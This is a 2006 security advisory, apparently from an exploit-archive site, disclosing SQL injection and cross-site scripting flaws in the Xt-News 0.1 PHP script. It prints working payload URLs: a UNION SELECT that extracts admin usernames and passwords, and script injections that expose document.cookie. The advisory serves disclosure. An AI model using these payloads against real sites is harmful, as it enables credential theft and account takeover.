Xt-News 0.1 : SQL Injection Vulnerability & XSS

2006.12.29
Credit: Mr_kaliman
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

Xt-News 0.1 ----------- Vendor site: http://dreaxteam.free.fr/forums/ Product: Xt-News 0.1 Vulnerability: SQL Injection Vulnerability & XSS Credits: Mr_KaLiMaN Reported to Vendor: 10/12/06 Public disclosure: 22/12/06 Description: ------------ SQL Injection Vulnerability: http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION] http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1# XSS: http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS] http://[victim]/[script_news_path]/add_comment.php?id_news="><script>ale rt(document.cookie)</script><foo " http://[victim]/[script_news_path]/show_news.php?id_news=[XSS] http://[victim]/[script_news_path]/show_news.php?id_news='><script>alert (document.cookie)</script><foo ' -------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top